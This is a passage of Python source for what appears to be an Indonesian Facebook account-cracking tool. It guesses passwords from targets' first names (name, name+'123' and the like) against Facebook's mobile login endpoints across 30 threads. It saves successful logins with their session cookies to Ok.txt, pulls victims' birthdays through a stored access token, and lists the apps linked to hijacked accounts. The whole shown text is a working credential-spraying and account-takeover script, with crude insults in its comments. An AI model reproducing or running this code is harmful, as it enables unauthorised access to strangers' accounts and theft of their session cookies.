print(' %s╠═[%s*%s] akun OK akan di simpan di file : Ok.txt'%(N,O,N))
print(' %s╠═[%s*%s] akun CP akan di simpan di file : Cp.txt'%(N,O,N))
print(' %s╚═[%s!%s] Mode pesawat 2 detik jika tidak ada hasil\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for me in self.id:
try:
uid, name = me.split('<=>')
sempak = name.split(' ')
nun = sempak[0]
if len(nun)>=6:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=2:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=5:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
else:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
dihi.submit(self.mbasic, uid, pwx)
except Exception as e:os.sys.exit(e)
except:pass
exit()
def mobilez(self):
print(' %s║'%(N))
print(' %s╠═[%s*%s] akun OK akan di simpan di file : Ok.txt'%(N,O,N))
print(' %s╠═[%s*%s] akun CP akan di simpan di file : Cp.txt'%(N,O,N))
print(' %s╚═[%s!%s] mode pesawat 2 detik jika tidak ada hasil\n'%(N,O,N))
with khamdihiXD(max_workers=30) as dihi:
for nama in self.id:
try:
uid, name = nama.split('<=>')
gas = name.split(' ')
nun = gas[0]
if len(nun)>=6:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=2:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
elif len(nun)<=5:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
else:
pwx = [nun, nun+'123', nun+'1234', nun+'12345', name]
dihi.submit(self.metod2, uid, pwx)
except Exception as e:os.sys.exit(e)
except:pass
exit()
def b_api(self,user,pwx): # Kamu jahat :v
global loop,ok,cp
eram = random.choice([M,K,H,U,P,N])
nufi = random.choice([N,P,U,H,K,M])
sys.stdout.write('\r %s* %s[%scrack%s] %s/%s [OK:%s - CP:%s] %s*'%(eram,N,O,N,loop,len(self.id),len(ok),len(cp),nufi));sys.stdout.flush() # Lo kontol...
try:
for pw in pwx:
pw = pw.lower()
ses = requests.Session()
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36"])
headers_ = {"Host":"free.facebook.com","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://free.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
p = ses.get('https://free.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F', headers=headers_).text
dataa = {"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
_headers = {"Host":"free.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://free.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://free.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
po = ses.post("https://free.facebook.com/login/device-based/validate-password/?shbl=0", data = dataa, headers=_headers, allow_redirects = False)
if "c_user" in ses.cookies.get_dict():
try:
coki=";".join([key+"="+value for key,value in ses.cookies.get_dict().items()])
print('\r %s--> %s • %s • %'%(H,user,pw,coki))
cek_apk(coki)
ok.append("%s • %s • %s "%(user,pw,coki))
open('Ok.txt', 'a').write(" --> %s • %s • %s\n"%(user,pw,coki))
break
except (KeyError, IOError):
day = ''
month = ''
year = ''
except:
pass
print('\r %s--> %s • %s • %s '%(H,user,pw,coki))
cek_apk(coki)
ok.append('%s • %s • %s'%(user,pw,coki))
open('Ok.txt', 'a').write(' --> %s • %s • %s\n'%(user,pw,coki))
break
elif 'checkpoint' in ses.cookies.get_dict():
try:
dihi = open('token.x', 'r').read()
lahir = requests.get(f"https://graph.facebook.com/{user}?fields=birthday&access_token={dihi}").json()['birthday']
day, month, year = lahir.split('/')
month = bulan12[month]
print('\r %s--> %s • %s '%(K,user,pw))
cp.append("%s • %s"%(user,pw,))
open('Cp.txt', 'a').write(" --> %s • %s \n"%(user,pw))
break
except (KeyError, IOError):
day = ''
month = ''
year = ''
except:
pass
print('\r %s--> %s • %s '%(K,user,pw))
cp.append('%s • %s'%(user,pw))
open('Cp.txt', 'a').write(" --> %s | %s\n"%(user,pw))
break
else:
continue
loop += 1
except requests.exceptions.ConnectionError:
time.sleep(31)
loop += 1
self.b_api(user,pwx)
def metod2(self,user,pwx):
global loop,ok,cp # METOK
ram = random.choice([M,P,H,U,J,N,B])
fikA = loop*100/len(self.id)
nufikhaXD = '%'
print('\r%s [crack] %s/%s [OK:%s-CP:%s] >< %s%s%s '%(ram,loop,len(self.id),len(ok),len(cp),int(fikA),str(nufikhaXD),N), end=' ');sys.stdout.flush()
ua = random.choice(ugen)
ua2 = random.choice(ugen2)
ses = requests.Session()
for pw in pwx:
try:
tix = time.time()
ses.headers.update({"Host":'m.facebook.com',"upgrade-insecure-requests":"1","user-agent":ua2,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})
p = ses.get('https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F').text
dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
ses.headers.update({"Host":'m.facebook.com',"cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://m.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"})
po = ses.post('https://m.facebook.com/login/device-based/validate-password/?shbl=0',data=dataa,allow_redirects=False)
if "checkpoint" in po.cookies.get_dict().keys():
print('\r %s--> %s • %s'%(K,user,pw))
cp.append("%s|%s"%(user, pw))
open("cp.txt","a").write("%s|%s\n"%(user, pw))
open("checkcp.txt","a").write("--> %s|%s\n"%(user, pw))
break
elif "c_user" in ses.cookies.get_dict().keys():
coki = (";").join([ "%s=%s" % (key, value) for key, value in ses.cookies.get_dict().items() ])
print('\r %s--> %s • %s %s'%(H,user,pw,N))
cek_apk(coki)
ok.append("%s|%s|%s"%(user, pw, coki))
open("ok.txt","a").write("--> %s|%s|%s\n"%(user, pw, coki))
break
else:
continue
except requests.exceptions.ConnectionError:
time.sleep(31)
loop+=1
def mbasic(self,user,pwx):
global loop,ok,cp
asw = random.choice([M,K,H,U])
mmk = random.choice([K,M,U,H])
sys.stdout.write('\r %s* %s[%scrack%s] %s/%s [OK:%s CP:%s] %s* '%(asw,N,H,N,loop,len(self.id),len(ok),len(cp),mmk));sys.stdout.flush()
try:
for pw in pwx:
pw = pw.lower()
ses = requests.Session()
ua = random.choice(["Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]","Mozilla/5.0 (Linux; Android 4.4.4; en-au; SAMSUNG SM-N915G Build/KTU84P) AppleWebKit/537.36 (KTHML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 4.1.2; Nokia_X Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.87.90 Mobile Safari/537.36 NokiaBrowser/1.0,gzip(gfe)","Mozilla/5.0 (Linux; U; Android 4.4.2; zh-CN; HUAWEI MT7-TL00 Build/HuaweiMT7-TL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/40.0.2214.89 UCBrowser/11.3.8.909 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 10; M2006C3MG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36","Mozilla/5.0 (Linux; Android 7.0; SM-G930VC Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/58.0.3029.83 Mobile Safari/537.36"])
headers_ = {"Host":"mbasic.facebook.com","upgrade-insecure-requests":"1","user-agent":ua,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
p = ses.get('https://mbasic.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F', headers=headers_).text
dataa = {"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":user,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
_headers = {"Host":"mbasic.facebook.com","cache-control":"max-age=0","upgrade-insecure-requests":"1","origin":"https://mbasic.facebook.com","content-type":"application/x-www-form-urlencoded","user-agent":"Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36","accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","x-requested-with":"mark.via.gp","sec-fetch-site":"same-origin","sec-fetch-mode":"cors","sec-fetch-user":"empty","sec-fetch-dest":"document","referer":"https://mbasic.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F","accept-encoding":"gzip, deflate br","accept-language":"en-GB,en-US;q=0.9,en;q=0.8"}
po = ses.post("https://mbasic.facebook.com/login/device-based/validate-password/?shbl=0", data = dataa, headers=_headers, allow_redirects = False)
if 'c_user' in ses.cookies.get_dict():
try:
coki =";".join([key+"="+value for key,value in ses.cookies.get_dict().items()])
nunu = open('token.x', 'r').read()
lahir = requests.get(f"https://graph.facebook.com/{user}?fields=birthday&access_token={nunu}").json()['birthday']
day, month, year = lahir.split('/')
month = bulan12[month]
print('\r %s--> %s • %s • %s %s %s • %s'%(H,user,pw,day,month,year,coki))
cek_apk(coki)
ok.append("%s • %s • %s %s %s • %s "%(user,pw,day,month,year,kukis))
open('Ok.txt', 'a').write(" --> %s ◊ %s ◊ %s %s %s ◊ %s \n"%(user,pw,day,month,year,coki))
break
except (KeyError, IOError):
day = ''
month = ''
year = ''
except:
pass
print('\r %s--> %s • %s • %s'%(H,user,pw,coki))
cek_apk(coki)
ok.append('%s • %s • %s'%(user,pw,coki))
open('Ok.txt', 'a').write(' --> %s ◊ %s ◊ %s\n'%(user,pw,coki))
break
elif 'checkpoint' in ses.cookies.get_dict():
try:
nunu = open('token.x', 'r').read()
lahir = requests.get(f"https://graph.facebook.com/{user}?fields=birthday&access_token={nunu}").json()['birthday']
day, month, year = lahir.split('/')
month = bulan12[month]
print('\r %s--> %s • %s • %s %s %s'%(K,user,pw,day,month,year))
cp.append("%s • %s • %s %s %s"%(user,pw,day,month,year))
open('Cp.txt', 'a').write(" --> %s • %s • %s %s %s\n"%(user,pw,day,month,year))
break
except (KeyError, IOError):
day = ''
month = ''
year = ''
except:
pass
print('\r %s--> %s • %s'%(K,user,pw))
cp.append('%s • %s'%(user,pw))
open('Cp.txt', 'a').write(" --> %s • %s\n"%(user,pw))
break
else:
continue
loop += 1
except requests.exceptions.ConnectionError:
time.sleep(31)
loop += 1
self.mbasic(user,pwx)
def cek_apk(coki):
session = requests.Session()
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=active",cookies={"cookie":"noscript=1;"+coki}).text
sop = bs4.BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
try:
for i in range(len(game)):
print ("\r %s%s %s%s"%(N,i+1,H,game[i].replace("Ditambahkan pada"," Ditambahkan pada")))
except AttributeError:
print ("\r %s! cookie invalid"%(N))
w=session.get("https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactive",cookies={"cookie":"noscript=1;"+coki}).text
sop = bs4.BeautifulSoup(w,"html.parser")
x = sop.find("form",method="post")
game = [i.text for i in x.find_all("h3")]
try:
for i in range(len(game)):
print ("\r %s%s %s%s"%(K,i+1,N,game[i].replace("Kedaluwarsa"," Kedaluwarsa")))
except AttributeError:
print ("\r %s• cookie invalid"%(M))
if __name__ == '__main__':
os.system('git pull')
menu().main()
folder()
# MAU NGAPAIN KENTOD #